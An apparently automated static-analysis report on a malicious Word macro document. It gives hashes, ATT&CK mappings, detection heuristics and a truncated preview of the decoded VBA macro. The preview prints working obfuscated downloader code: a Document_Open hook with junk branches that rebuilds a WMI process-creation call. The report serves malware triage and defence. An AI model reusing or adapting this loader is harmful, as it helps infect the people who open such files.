Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 33f6250cf810bedc…

Verdict: MALICIOUS
File type: Office (OLE)
Size: 201.3 KB
Created: 2020-08-19 22:16:00
Authoring application: Microsoft Office Word
First seen: 2020-09-15
MD5: 4c15d618cf5cdf37caff73a5ffc16f86
SHA-1: e35a8fcdd5ad39e49c32ba44d36edce2ab7cdc91
SHA-256: 33f6250cf810bedca7bbd2cd3cfe0b004e866ce8c52e02012bc83f0e40c14624
Risk Score: 262

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1566.001 Spearphishing Attachment
  • T1204.002 Malicious File

The file is identified as malicious by ClamAV with the signature 'Doc.Downloader.Sagent-9405246-0'. Static analysis revealed the presence of VBA macros, specifically a 'Document_Open' macro that utilizes 'CreateObject' and a hidden UserForm property to execute a command stager. This indicates the document is designed to download and execute a secondary payload upon opening.

Heuristics (7)

  • ClamAV: Doc.Downloader.Sagent-9405246-0 [critical] CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Sagent-9405246-0
  • VBA macros detected [medium, 4 related findings] OLE_VBA_MACROS
    Document contains VBA macro code
  • VBA UserForm hidden-property command stager [critical] OLE_VBA_USERFORM_HIDDEN_COMMAND_STAGER
    VBA auto-exec macro creates a COM object from a decoded variable and reconstructs command text through Split/Join and hidden UserForm properties such as ControlTipText, Tag, Pages, or HelpContextId. This is a high-confidence macro downloader/loader shape seen in the reviewed OLE set, but it is not an Office CVE exploit primitive.
  • Document_Open macro [high] OLE_VBA_DOCOPEN
    Document_Open macro
  • CreateObject call [high] OLE_VBA_CREATEOBJ
    CreateObject call
  • VBA p-code auto-exec with execution tokens [high] OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Embedded URL [info] EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 15435 bytes
SHA-256: 51329823e7f8b13d83aeceda1d86214809174a9434d2e6af77f7d01ca10cd156

Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "Fx4npncalbauvxk"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub _
Document_open()
Hscqgu8qthu6ygds.Q7d8cm642w5
End Sub


Attribute VB_Name = "Hscqgu8qthu6ygds"
Attribute VB_Base = "0{5AF58D64-1263-462D-9EE2-DC86480F8D51}{F3F38C89-BE0F-46FA-A361-09702AD86517}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Function Q7d8cm642w5()
   Yqh4megq_3xi04hl = "842"
If Len("Mhgmed53cnmmz6ivf2Zxl9hfpxmvbcqbw") = Len("Swn6nobj36dl9") + 1 Then End
If Len("R5bwmkfk0gzrrgH8lcvt048jvBgnbez98ia61mep") < Len("Ef896iq04jm71bfm") Then
        MsgBox "Scewfv3tk5kbv2rdm" + "Tny161pi7mchg7s"
        MsgBox ("Qblbbveovpg8is73nq")
        MsgBox "Zd_ipg81prdxou" + "Cp4kvgijfqttanrk"
End If
If Len("Tss6y587f7z9s34nvL_d6i25537y7n9") = Len("G88b3pw8pqlu") Then
       MsgBox "Qy2fp9bl27k2b" + "Baijs22i78m5_5cyp"
       MsgBox ("Fshdfsqp87tawk2wu8 !!!")
       MsgBox "E44wp465w0hi" + "Mmutx0714d6"
End If

Eo8jjpj7u2sf = Hscqgu8qthu6ygds.HelpContextId + 50 + 50
   Ehjkal7pzf_7qsed = "190"
If Len("S7m73v7mcxve0Lpb3vqzvrxfi9v") = Len("Tws3l6fw3oxn9") + 1 Then End
If Len("Rll2zuqo1uyxfp11txZkacmxwk4kn9cQ3l6sja8n89ezz27") < Len("W_c0yzj0eck") Then
        MsgBox "Dmwv8typ7ankd9de" + "Y8u9it0_4_dc"
        MsgBox ("Kg1iiult4fdrg6x461")
        MsgBox "D1gf2285yvduun_" + "Eu6zu41f3rqczlg9"
End If
If Len("N9fia_sm1y9zNeghqjabbmaaokk") = Len("Empflcp5ofvmm5f3q") Then
       MsgBox "Ym8r799hrwfh" + "Ritvlttkrzm4kzyz"
       MsgBox ("Ejuim99zrrid !!!")
       MsgBox "Vzgt7e5j5i97ryu" + "Pijtjp8yomkv76bl"
End If

Un4bptd328izzm5 = ChrW(Eo8jjpj7u2sf + (15))
   Pur6dxizxun5a = "725"
If Len("Gtrab4i9al8ted7aAojcbkc9hhca21c") = Len("Ihr268aeyug9vtf4wb") + 1 Then End
If Len("L2whioc6vf9jvN38pjzenfoseenzcjSoxi2_in4cp02k") < Len("Cc2jommhcwh1djz") Then
        MsgBox "N8ttgikb8g88" + "Ygyiucl947b"
        MsgBox ("Evxtkfdd88ch3")
        MsgBox "W31mhqqgdpuruh" + "F1bsf_xxsxb55e"
End If
If Len("Dqrfhtiqyw9Mh_4w7zzgb1") = Len("Kheh1gxxbcldaoa") Then
       MsgBox "Zkn8i_gpt6p9ep7d27" + "Zoa2r0k0p873i7418"
       MsgBox ("Unpb1z72zswghmfw !!!")
       MsgBox "M0t890a3txc" + "Bm1_q0sm0zm7"
End If

Eon55phiam8 = "111ss[sns ]]d][ jsa nbsb22v2yf111ss[sns ]]d][ jsa nbsb22v2yfw111ss[sns ]]d][ jsa nbsb22v2yfi111ss[sns ]]d][ jsa nbsb22v2yfnm111ss[sns ]]d][ jsa nbsb22v2yf111ss[sns ]]d][ jsa nbsb22v2yfgm111ss[sns ]]d][ jsa nbsb22v2yft111ss[sns ]]d][ jsa nbsb22v2yf111ss[sns ]]d][ jsa nbsb22v2yf" + Un4bptd328izzm5 + "111ss[sns ]]d][ jsa nbsb22v2yf111ss[sns ]]d][ jsa nbsb22v2yf:111ss[sns ]]d][ jsa nbsb22v2yfw111ss[sns ]]d][ jsa nbsb22v2yfin111ss[sns ]]d][ jsa nbsb22v2yf111ss[sns ]]d][ jsa nbsb22v2yf3111ss[sns ]]d][ jsa nbsb22v2yf2111ss[sns ]]d][ jsa nbsb22v2yf_111ss[sns ]]d][ jsa nbsb22v2yf" + Hscqgu8qthu6ygds.Dwa66cjerrj + "111ss[sns ]]d][ jsa nbsb22v2yfro111ss[sns ]]d][ jsa nbsb22v2yf111ss[sns ]]d][ jsa nbsb22v2yfce111ss[sns ]]d][ jsa nbsb22v2yfs111ss[sns ]]d][ jsa nbsb22v2yfs111ss[sns ]]d][ jsa nbsb22v2yf"
   Pwqb0f_m5sd1 = "460"
If Len("Fj22o9n9rf8vcmuJlmu_buhr6_rk") = Len("N77e66h0eo1je") + 1 Then End
If Len("Or74p_qg3gvgztN07xexaz9r1eoY518dy_0gbk8") < Len("C1uzfy1vp6xa4") Then
        MsgBox "U9m16c_5m6jw7ju" + "Wmhl80o4urywt_d8k"
        MsgBox ("Fa5lp5mkozpu")
        MsgBox "Lbx_k4sx6uugooolm" + "Jl2ct0u9o_wuznayi"
End If
If Len("Wa5e4smrkfbq0_bCiboszqmptak6hf1g4") = Len("I9itj1cyo80axs") Then
       MsgBox "H4x6cgvr1jscxd_lj" + "O1a614yqabqq"
       MsgBox ("J3d8ndm2i3qtj3y !!!")
       MsgBox "Ppvz7d42qc5gwg" + "Aj3ektgxh9ol0vl"
End If

Yun7txioicd_y40ed = Fkn1djpvjpknl(Eon55phiam8)
   Eb_oxeb6ragsfhny = "168"
If Len("Ztmlj4n4c2zpr0Od_dxotrzc1r") = Len("Jf0mzp528p9iwwvnmq") + 1 Then End
If Len("B_0cikadqbyjumoq94Tcfqyyb
... (truncated)